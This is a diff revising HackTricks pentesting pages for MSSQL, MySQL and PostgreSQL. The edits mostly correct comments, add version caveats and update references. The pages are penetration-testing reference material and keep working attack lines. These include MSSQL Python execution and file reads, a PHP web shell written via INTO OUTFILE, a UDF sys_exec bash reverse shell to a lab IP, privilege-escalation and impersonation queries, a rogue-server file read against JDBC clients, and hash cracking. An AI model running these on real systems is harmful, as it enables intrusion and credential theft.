-# Print the user being used (and execute commands)
+-- Print the user being used (and execute commands)
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-#Open and read a file
+-- Open and read a file
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
-#Multiline
+-- Multiline script
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'
 import sys
 print(sys.version)
@@ -671,12 +655,12 @@ Microsoft SQL Server provides **multiple extended stored procedures** that allow
 | sys.xp_regremovemultistring | sys.xp_instance_regremovemultistring |
 
 ```sql
-# Example read registry
+-- Example: read the registry
 EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
-# Example write and then read registry
+-- Example: write and then read the registry
 EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
 EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
-# Example to check who can use these functions
+-- Example: inspect explicit permissions on these procedures
 Use master;
 EXEC sp_helprotect 'xp_regread';
 EXEC sp_helprotect 'xp_regwrite';
@@ -688,11 +672,11 @@ For **more examples** check out the [**original source**](https://blog.wayneshef
 
 It's possible to **load a .NET dll within MSSQL with custom functions**. This, however, **requires `dbo` access** so you need a connection with database **as `sa` or an Administrator role**.
 
-[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example.
+See [MSSQL user-defined function SQLHttp](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) for an example.
 
 ### RCE with `autoadmin_task_agents`
 
-According[ **to this post**](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp), it's also possible to load a remote dll and make MSSQL execute it with something like:<sup>[[18]](#references)</sup>
+According to the cited research, some vulnerable/privileged configurations can load a remote assembly through `autoadmin_task_agents`. This is version- and component-specific; verify that the internal table and Smart Admin task loader exist before treating it as a general SQL Server primitive.<sup>[[18]](#references)</sup>
 
 ```sql
 update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
@@ -758,26 +742,26 @@ There are other methods to get command execution, such as adding [extended store
 
 ### From db_owner to sysadmin
 
-If a **regular user** is given the role **`db_owner`** over the **database owned by an admin** user (such as **`sa`**) and that database is configured as **`trustworthy`**, that user can abuse these privileges to **privesc** because **stored procedures** created in there that can **execute** as the owner (**admin**).<sup>[[13]](#references)</sup>
+If a regular user is `db_owner` of a database whose owner maps to a privileged server login (such as `sa`) and `TRUSTWORTHY` is enabled, modules created with `EXECUTE AS OWNER` may cross the database boundary and escalate server privileges. Ownership, signing, and server permissions still matter; `db_owner` or `TRUSTWORTHY` alone is not sufficient.<sup>[[13]](#references)</sup>
 
 ```sql
-# Get owners of databases
+-- Get owners of databases
 SELECT suser_sname(owner_sid) FROM sys.databases
 
-# Find trustworthy databases
+-- Find trustworthy databases
 SELECT a.name,b.is_trustworthy_on
 FROM master..sysdatabases as a
 INNER JOIN sys.databases as b
 ON a.name=b.name;
 
-# Get roles over the selected database (look for your username as db_owner)
+-- Get roles in the selected database (look for your username as db_owner)
 USE <trustworthy_db>
 SELECT rp.name as database_role, mp.name as database_user
 from sys.database_role_members drm
 join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
 join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
 
-# If you found you are db_owner of a trustworthy database, you can privesc:
+-- If the complete vulnerable chain is present, test escalation:
 --1. Create a stored procedure to add your user to sysadmin role
 USE <trustworthy_db>
 
@@ -813,34 +797,37 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
 SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends.<sup>[[14]](#references)</sup>
 
 ```sql
-# Find users you can impersonate
-SELECT distinct b.name
-FROM sys.server_permissions a
-INNER JOIN sys.server_principals b
-ON a.grantor_principal_id = b.principal_id
-WHERE a.permission_name = 'IMPERSONATE'
-# Check if the user "sa" or any other high privileged user is mentioned
+-- Find logins on which the current login has an explicit IMPERSONATE grant
+SELECT DISTINCT target.name
+FROM sys.server_permissions AS perm
+JOIN sys.server_principals AS target
+  ON perm.major_id = target.principal_id
+WHERE perm.class_desc = 'LOGIN'
+  AND perm.permission_name = 'IMPERSONATE'
+  AND perm.state IN ('G', 'W')
+  AND perm.grantee_principal_id = SUSER_ID();
+-- Check whether sa or another privileged login is returned
 
-# Impersonate sa user
+-- Impersonate the sa login
 EXECUTE AS LOGIN = 'sa'
 SELECT SYSTEM_USER
 SELECT IS_SRVROLEMEMBER('sysadmin')
 
-# If you can't find any users, make sure to check for links
+-- If no login is returned, check linked servers too
 enum_links
-# If there is a link of interest, re-run the above steps on each link
+-- Re-run the checks on each in-scope link
 use_link [NAME]
 ```
 
 > [!TIP]
-> If you can impersonate a user, even if he isn't sysadmin, you should check i**f the user has access** to other **databases** or linked servers.
+> If you can impersonate a user, even if that login is not `sysadmin`, check whether it has access to other databases or linked servers. Explicit-grant queries may miss access inherited through roles or broader permissions such as `CONTROL SERVER`; corroborate with `fn_my_permissions` and safe `EXECUTE AS` tests.
 
 Note that once you are sysadmin you can impersonate any other one:
 
 ```sql
 -- Impersonate RegUser
 EXECUTE AS LOGIN = 'RegUser'
--- Verify you are now running as the the MyUser4 login
+-- Verify you are now running as the MyUser4 login
 SELECT SYSTEM_USER
 SELECT IS_SRVROLEMEMBER('sysadmin')
 -- Change back to sa
@@ -885,18 +872,7 @@ For further information, refer to the following links regarding this attack: [De
 
 ## Local Privilege Escalation
 
-The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\
-You probably will be able to **escalate to Administrator** following one of these 2 paged:
-
-
-{{#ref}}
-../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
-{{#endref}}
-
-
-{{#ref}}
-../../windows-hardening/windows-local-privilege-escalation/juicypotato.md
-{{#endref}}
+After obtaining OS command execution, inspect the SQL Server service account's actual token with `whoami /priv`; do not assume `SeImpersonatePrivilege` is enabled. If it is enabled and the Windows build/configuration is susceptible, review [RoguePotato and PrintSpoofer](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md) and [JuicyPotato](../../windows-hardening/windows-local-privilege-escalation/juicypotato.md). Applicability depends on the OS version, COM/RPC reachability, service hardening, and token state.
 
 ## Shodan
 
@@ -913,7 +889,7 @@ You probably will be able to **escalate to Administrator** following one of thes
 - [7] [Microsoft Learn - sp_invoke_external_rest_endpoint (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-invoke-external-rest-endpoint-transact-sql?view=sql-server-ver17)
 - [8] [Microsoft Learn - CREATE EXTERNAL MODEL (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-external-model-transact-sql?view=sql-server-ver17)
 - [9] [Microsoft Learn - AI_GENERATE_EMBEDDINGS (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/functions/ai-generate-embeddings-transact-sql?view=sql-server-ver17)
-- [10] [How to get the list of all database users - Stack Overflow](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
+- [10] [Microsoft Learn – `sys.database_principals`](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver17)
 - [11] [SQL Server Login User Permissions with fn_my_permissions - MSSQLTips](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [12] [Advanced MSSQL Injection Tricks - PT SWARM](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
 - [13] [Hacking SQL Server Stored Procedures - Part 1: (Un)Trustworthy Databases - NetSPI](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
@@ -923,6 +899,9 @@ You probably will be able to **escalate to Administrator** following one of thes
 - [17] [GOADv2 pwning - part 12 - mayfly277](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
 - [18] [SQL Server exploitation notes - exploit7 (translated)](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
 - [19] [netspi.com - Decrypting MSSQL Database Link Server Passwords](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords)
+- [20] [Microsoft Learn – SQL Server network configuration and ports](https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/server-network-configuration?view=sql-server-ver17)
+- [21] [Amazon RDS for SQL Server unsupported features](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/SQLServer.Concepts.General.FeatureNonSupport.html)
+- [22] [Microsoft Learn – SQL Server system databases](https://learn.microsoft.com/en-us/sql/relational-databases/databases/system-databases?view=sql-server-ver17)
 
 
 ## HackTricks Automatic Commands

--- a/src/network-services-pentesting/pentesting-mysql.md
+++ b/src/network-services-pentesting/pentesting-mysql.md
@@ -1,10 +1,10 @@
-# 3306 - Pentesting Mysql
+# 3306 - Pentesting MySQL
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## **Basic Information**
 
-**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.
+**MySQL** is an open-source relational database management system that uses SQL. The server commonly listens on TCP/3306, although both its TCP port and Unix socket are configurable.
 
 **Default port:** 3306
 
@@ -18,7 +18,7 @@
 
 ```bash
 mysql -u root # Connect to root without password
-mysql -u root -p # A password will be asked (check someone)
+mysql -u root -p # Prompt for the password
 ```
 
 ### Remote
@@ -30,7 +30,7 @@ mysql -h <Hostname> -u root@localhost
 
 ## External Enumeration
 
-Some of the enumeration actions require valid credentials
+Some enumeration actions require valid credentials.
 
 ```bash
 nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
@@ -61,10 +61,11 @@ show tables;
 describe <table_name>;
 show columns from <table>;
 
-select version(); #version
-select @@version(); #version
-select user(); #User
-select database(); #database name
+select version(); # Version
+select @@version(); # Version
+select user(); # Authenticated user and client host
+select current_user(); # Account used for privilege checks
+select database(); # Current database name
 
 #Get a shell with the mysql client user
 \! sh
@@ -74,14 +75,16 @@ Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.
 Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
 
 #Read & Write
-## Yo need FILE privilege to read & write to files.
+## You need the FILE privilege to read and write server-side files.
 select load_file('/var/lib/mysql-files/key.txt'); #Read file
 select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
 
-#Try to change MySQL root password
+# Legacy direct grant-table updates (version-dependent; prefer ALTER USER on supported releases)
 UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
 UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
 FLUSH PRIVILEGES;
+# Modern syntax
+ALTER USER 'root'@'localhost' IDENTIFIED BY 'MyNewPass';
 quit;
 ```
 
@@ -93,7 +96,7 @@ mysql -u root -h 127.0.0.1 -e 'show databases;'
 ### MySQL Permissions Enumeration
 
 ```sql
-#Mysql
+# MySQL
 SHOW GRANTS [FOR user];
 SHOW GRANTS;
 SHOW GRANTS FOR 'root'@'localhost';
@@ -115,14 +118,12 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT
 SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
 ```
 
-You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
+The MySQL manual documents the meaning and scope of each privilege.<sup>[[8]](#references)</sup>
 
 ### MySQL File RCE
 
 
-{{#ref}}
-../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
-{{#endref}}
+See also [MySQL SSRF techniques](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md).
 
 #### INTO OUTFILE → Python `.pth` RCE (site-specific configuration hooks)
 
@@ -147,9 +148,9 @@ Example of crafting the file through an **UNION** query (space characters replac
 Important limitations & bypasses:
 
 * `INTO OUTFILE` **cannot overwrite** existing files; choose a new filename.
-* The file path is resolved **relative to MySQL’s CWD**, so prefixing with `../../` helps to shorten the path and bypass absolute-path restrictions.
+* A relative output path is resolved below MySQL's data directory. Traversal may reach another writable location only when filesystem permissions and `secure_file_priv` permit it; an absolute path is clearer when the injection's length restrictions allow one.<sup>[[8]](#references)</sup>
 * If the attacker input is extracted with `%128s` (or similar) any space will truncate the payload; use MySQL comment sequences `/**/` or `/*!*/` to replace spaces.
-* The MySQL user running the query needs the `FILE` privilege, but in many appliances (e.g. FortiWeb) the service runs as **root**, giving write access almost everywhere.
+* The database account needs the `FILE` privilege, and the `mysqld` operating-system account needs write access to the target directory. The FortiWeb case was unusually severe because `mysqld` ran as **root**; normal installations should never do this.<sup>[[1]](#references)[[8]](#references)</sup>
 
 After dropping the `.pth`, simply request any CGI handled by the python interpreter to get code execution:
 
@@ -172,15 +173,13 @@ uid=0(root) gid=0(root) groups=0(root)
 
 ## MySQL arbitrary read file by client
 
-Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
-Please notice that this is the behaviour using:
+With `LOAD DATA LOCAL INFILE`, the server asks the **client** to read a local file and send its contents. A malicious server can therefore request an unintended client-side file when a victim can be induced to connect and the client permits local-file loading.
 
 ```bash
 load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
 ```
 
-(Notice the "local" word)\
-Because without the "local" you can get:
+Without the `LOCAL` keyword, the server reads from its own filesystem and server-side restrictions such as `secure_file_priv` apply:
 
 ```bash
 mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
@@ -198,7 +197,7 @@ ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti
 
 ## POST
 
-### Mysql User
+### MySQL user
 
 It will be very interesting if mysql is running as **root**:
 
@@ -212,10 +211,10 @@ systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=
 In the configuration of MySQL services, various settings are employed to define its operation and security measures:
 
 - The **`user`** setting is utilized for designating the user under which the MySQL service will be executed.
-- **`password`** is applied for establishing the password associated with the MySQL user.
+- A **`password`** option in a client section stores a connection password in plaintext; it is not the server account database and should be protected carefully.
 - **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
-- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs.
-- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
+- **`debug`** or verbose general/query logging can expose queries and sensitive values in logs.
+- **`sql_warnings`** is a legacy setting that controls warning reporting for single-row inserts; review logs for unintended query data.
 - With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security.
 
 #### Local Linux enumeration
@@ -259,7 +258,7 @@ mysql -S /run/mysqld/mysqld.sock -u root -e "
 ### Privilege escalation
 
 ```bash
-# Get current user (an all users) privileges and hashes
+# Get the current user and inspect users, privileges, and hashes
 use mysql;
 select user();
 select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
@@ -269,16 +268,16 @@ SELECT * FROM mysql.user;
 mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"
 
 # Create user and give privileges
-create user test identified by 'test';
-grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
+CREATE USER 'test'@'%' IDENTIFIED BY 'test';
+GRANT SELECT,CREATE,DROP,UPDATE,DELETE,INSERT ON *.* TO 'test'@'%' WITH GRANT OPTION;
 
-# Get a shell (with your permissions, usefull for sudo/suid privesc)
+# Get a shell as the local mysql client process (useful during host privilege escalation)
 \! sh
 ```
 
 ### Privilege Escalation via library
 
-If the **mysql server is running as root** (or a different more privileged user) you can make it execute commands. For that, you need to use **user defined functions**. And to create a user defined you will need a **library** for the OS that is running mysql.
+If the MySQL server runs as **root** or another overprivileged user, a database administrator may be able to execute OS commands by installing a malicious **user-defined function (UDF)** library. This requires the privileges needed to create functions and place a compatible library in `plugin_dir`; modern packages normally make that directory unwritable by the `mysqld` account.
 
 The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **linux** libraries and the **`.dll`** are the **Windows** ones, choose the one you need.
 
@@ -289,7 +288,7 @@ gcc -g -c raptor_udf2.c
 gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 ```
 
-Now that you have the library, login inside the Mysql as a privileged user (root?) and follow the next steps:
+After obtaining a library built for the target architecture, log in to MySQL as a sufficiently privileged database account and follow the applicable lab workflow:
 
 #### Linux
 
@@ -316,7 +315,7 @@ select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
 #### Windows
 
 ```sql
-# CHech the linux comments for more indications
+# Check the Linux comments above for the equivalent steps
 USE mysql;
 CREATE TABLE npn(line blob);
 INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
@@ -340,15 +339,15 @@ This turns limited `SELECT ... INTO OUTFILE` into a more complete primitive on W
 
 ### Extracting MySQL credentials from files
 
-Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**
+Older Debian/Ubuntu packages may store plaintext credentials for a **`debian-sys-maint`** account in `/etc/mysql/debian.cnf`; newer installations may use socket authentication or omit that account.
 
 ```bash
 cat /etc/mysql/debian.cnf
 ```
 
-You can **use these credentials to login in the mysql database**.
+If present and still valid, these credentials may allow a local database login.
 
-Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** (the ones that you can extract from mysql.user inside the database)_._
+On old releases where the `mysql.user` grant table uses MyISAM, `/var/lib/mysql/mysql/user.MYD` can contain account hashes. Current MySQL versions use different system-table storage, so query `mysql.user` through the server whenever possible.
 
 You can extract them doing:
 
@@ -364,21 +363,19 @@ You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting 
 
 ### Useful files
 
-Configuration Files
+Configuration files
 
-- windows \*
+- Windows
   - config.ini
   - my.ini
     - windows\my.ini
     - winnt\my.ini
-  - \<InstDir>/mysql/data/
-  - unix
-    - my.cnf
-      - /etc/my.cnf
-      - /etc/mysql/my.cnf
-      - /var/lib/mysql/my.cnf
-      - \~/.my.cnf
-      - /etc/my.cnf
+- `<InstDir>/mysql/data/`
+- Unix-like systems
+  - `/etc/my.cnf`
+  - `/etc/mysql/my.cnf`
+  - `/var/lib/mysql/my.cnf`
+  - `~/.my.cnf`
 - Command History
   - \~/.mysql.history
 - Log Files
@@ -741,17 +738,16 @@ Entry_4:
 
 ​
 
-## 2023-2025 Highlights (new)
+## Recent techniques
 
-### JDBC `propertiesTransform` deserialization (CVE-2023-21971)
-From Connector/J <= 8.0.32 an attacker who can influence the **JDBC URL** (for instance in third-party software that asks for a connection string) can request arbitrary classes to be loaded on the *client* side via the `propertiesTransform` parameter. If a gadget present on the class-path is loadable this results in **remote code execution in the context of the JDBC client** (pre-auth, because no valid credentials are required). A minimal PoC looks like:
+### JDBC `propertiesTransform` class loading (CVE-2023-21971)
+In Connector/J through 8.0.32, an attacker who can influence the **JDBC URL** can supply a class name through `propertiesTransform`. The driver loads and instantiates that client-side class as a connection-properties transformer. If an attacker-controlled or otherwise dangerous compatible class is already reachable on the application's classpath, this can result in code execution in the JDBC client's context before database authentication. A minimal URL looks like:
 
 ```java
 jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
 ```
 
-Running `Evil.class` can be as easy as producing it on the class-path of the vulnerable application or letting a rogue MySQL server send a malicious serialized object. The issue was fixed in Connector/J 8.0.33 – upgrade the driver or explicitly set `propertiesTransform` on an allow-list.  
-(See Snyk write-up for details)<sup>[[6]](#references)</sup>  
+This particular path requires the named class to be available to the application; rogue-server deserialization is a separate Connector/J attack surface. The issue was fixed in Connector/J 8.0.33, so upgrade the driver and do not accept attacker-controlled JDBC properties.<sup>[[6]](#references)</sup>
 
 ### Rogue / Fake MySQL server attacks against JDBC clients
 Several open-source tools implement a *partial* MySQL protocol in order to attack JDBC clients that connect outwards:
@@ -774,23 +770,22 @@ java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server
 Then point the victim application to `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` and read `/etc/passwd` by encoding the filename as base64 in the *username* field (`fileread_/etc/passwd` → `base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).<sup>[[7]](#references)</sup>
 
 ### Cracking `caching_sha2_password` hashes
-MySQL ≥ 8.0 stores password hashes as **`$mysql-sha2$`** (SHA-256). Both Hashcat (mode **21100**) and John-the-Ripper (`--format=mysql-sha2`) support offline cracking since 2023. Dump the `authentication_string` column and feed it directly:
+MySQL 8 accounts using `caching_sha2_password` commonly have an `authentication_string` beginning **`$A$`** (digest identifier, iteration field, salt, and digest). Hashcat supports this as mode **7401**. Confirm the account's `plugin` and preserve the complete authentication string when extracting it.<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 # extract hashes
-echo "$mysql-sha2$AABBCC…" > hashes.txt
+mysql -N -B -e "SELECT authentication_string FROM mysql.user WHERE plugin='caching_sha2_password'" > hashes.txt
 # Hashcat
-hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
-# John the Ripper
-john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
+hashcat -a 0 -m 7401 hashes.txt /path/to/wordlist
 ```
 
-### Hardening checklist (2025)
-• Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** to kill most file-read/write primitives.  
-• Remove the **`FILE`** privilege from application accounts.  
-• On Connector/J set `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (empty).  
-• Disable unused authentication plugins and **require TLS** (`require_secure_transport = ON`).  
-• Monitor for `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` and sudden `SET GLOBAL` statements.
+### Hardening checklist
+
+- Set **`local_infile=OFF`** where client-side loading is unnecessary, and set **`secure_file_priv=NULL`** to disable server-side import/export operations when they are not required.
+- Remove the **`FILE`** privilege from application accounts.
+- On Connector/J, keep `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, and `autoDeserialize=false`; do not let untrusted input control `propertiesTransform` or other JDBC properties.
+- Disable unused authentication plugins and **require TLS** (`require_secure_transport=ON`).
+- Monitor for `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL`, and unexpected `SET GLOBAL` statements.
 
 ---
 
@@ -803,5 +798,8 @@ john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
 - [5] [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 - [6] [Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
 - [7] [mysql-fake-server – Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
+- [8] [MySQL 8.4 Reference Manual - privileges and server-side file operations](https://dev.mysql.com/doc/refman/8.4/en/privileges-provided.html)
+- [9] [MySQL worklog - `caching_sha2_password` storage format](https://dev.mysql.com/worklog/task/?id=9591)
+- [10] [Hashcat issue adding mode 7401 for MySQL `$A$`](https://github.com/hashcat/hashcat/issues/2305)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-postgresql.md
+++ b/src/network-services-pentesting/pentesting-postgresql.md
@@ -1,12 +1,12 @@
-# 5432,5433 - Pentesting Postgresql
+# 5432 - Pentesting PostgreSQL
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## **Basic Information**
 
-**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations.
+**PostgreSQL** is an open-source object-relational database system. It supports SQL plus extensible data types, functions, procedural languages, operators, and indexes.
 
-**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
+**Default port:** 5432. PostgreSQL does **not** automatically move to 5433 when the configured port is occupied; the server normally fails to bind until the conflict or its `port` setting is changed. Multiple local clusters are often configured manually on consecutive ports such as 5432 and 5433.<sup>[[18]](#references)</sup>
 
 ```
 PORT     STATE SERVICE
@@ -18,10 +18,10 @@ PORT     STATE SERVICE
 ```bash
 psql -U <myuser> # Open psql console with user
 psql -h <host> -U <username> -d <database> # Remote connection
-psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
+psql -h <host> -p <port> -U <username> -W -d <database> # Force a password prompt
 ```
 
-```sql
+```text
 psql -h localhost -d <database_name> -U <User> #Password will be prompted
 \list # List databases
 \c <database> # use the database
@@ -48,7 +48,7 @@ SELECT usename, passwd from pg_shadow;
 SELECT lanname,lanacl FROM pg_language;
 
 # Show installed extensions
-SHOW rds.extensions;
+SHOW rds.extensions; -- AWS RDS only
 SELECT * FROM pg_extension;
 
 # Get history of commands executed
@@ -56,14 +56,9 @@ SELECT * FROM pg_extension;
 ```
 
 > [!WARNING]
-> If running **`\list`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**.
+> Finding an **`rdsadmin`** database with `\list` is a strong indicator of an **Amazon RDS for PostgreSQL** instance.
 
-For more information about **how to abuse a PostgreSQL database** check:
-
-
-{{#ref}}
-../pentesting-web/sql-injection/postgresql-injection/
-{{#endref}}
+For SQL-injection-specific techniques, see [PostgreSQL injection](../pentesting-web/sql-injection/postgresql-injection/).
 
 ## Automatic Enumeration
 
@@ -174,12 +169,12 @@ SELECT
 FROM pg_catalog.pg_roles r
 ORDER BY 1;
 
-# Check if current user is superiser
+# Check whether the current user is a superuser
 ## If response is "on" then true, if "off" then false
 SELECT current_setting('is_superuser');
 
 # Try to grant access to groups
-## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
+## This requires administrative authority over the role; exact CREATEROLE behavior is version-dependent (see below)
 GRANT pg_execute_server_program TO "username";
 GRANT pg_read_server_files TO "username";
 GRANT pg_write_server_files TO "username";
@@ -226,7 +221,7 @@ FROM information_schema.routines
 WHERE routines.specific_schema='pg_catalog'
 ORDER BY routines.routine_name, parameters.ordinal_position;
 
-# Another aparent option
+# Another option
 SELECT * FROM pg_proc;
 ```
 
@@ -244,7 +239,7 @@ SELECT * FROM demo;
 ```
 
 > [!WARNING]
-> Remember that if you aren't super user but has the **CREATEROLE** permissions you can **make yourself member of that group:**
+> On PostgreSQL 15 and earlier, a role with **`CREATEROLE`** could grant itself membership in these non-superuser predefined roles. PostgreSQL 16 restricted this behavior: membership changes require the applicable **`ADMIN OPTION`** (or superuser authority). Test the target version and effective grant options before relying on this path.<sup>[[19]](#references)</sup>
 >
 > ```sql
 > GRANT pg_read_server_files TO username;
@@ -255,7 +250,7 @@ SELECT * FROM demo;
 There are **other postgres functions** that can be used to **read file or list a directory**. Only **superusers** and **users with explicit permissions** can use them:
 
 ```sql
-# Before executing these function go to the postgres DB (not in the template1)
+# Before executing these functions, connect to the postgres DB (not template1)
 \c postgres
 ## If you don't do this, you might get "permission denied" error even if you have permission
 
@@ -270,7 +265,7 @@ select * from pg_read_binary_file('/etc/passwd');
 
 # Try to grant permissions
 GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
-# By default you can only access files in the datadirectory
+# By default you can only access files in the data directory
 SHOW data_directory;
 # But if you are a member of the group pg_read_server_files
 # You can access any file, anywhere
@@ -289,7 +284,7 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
 ```
 
 > [!WARNING]
-> Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:**
+> On PostgreSQL 15 and earlier, `CREATEROLE` could make this grant possible for non-superuser predefined roles. PostgreSQL 16 and later require the relevant `ADMIN OPTION` or superuser authority.<sup>[[19]](#references)</sup>
 >
 > ```sql
 > GRANT pg_write_server_files TO username;
@@ -302,12 +297,7 @@ A very important limitation of this technique is that **`copy` cannot be used to
 
 ### **Binary files upload**
 
-However, there are **other techniques to upload big binary files:**
-
-
-{{#ref}}
-../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
-{{#endref}}
+For binary-safe alternatives, see [uploading large binary files through PostgreSQL](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md).
 
 
 
@@ -323,7 +313,7 @@ Required steps:
     SELECT setting FROM pg_settings WHERE name = 'data_directory';
     ```
 
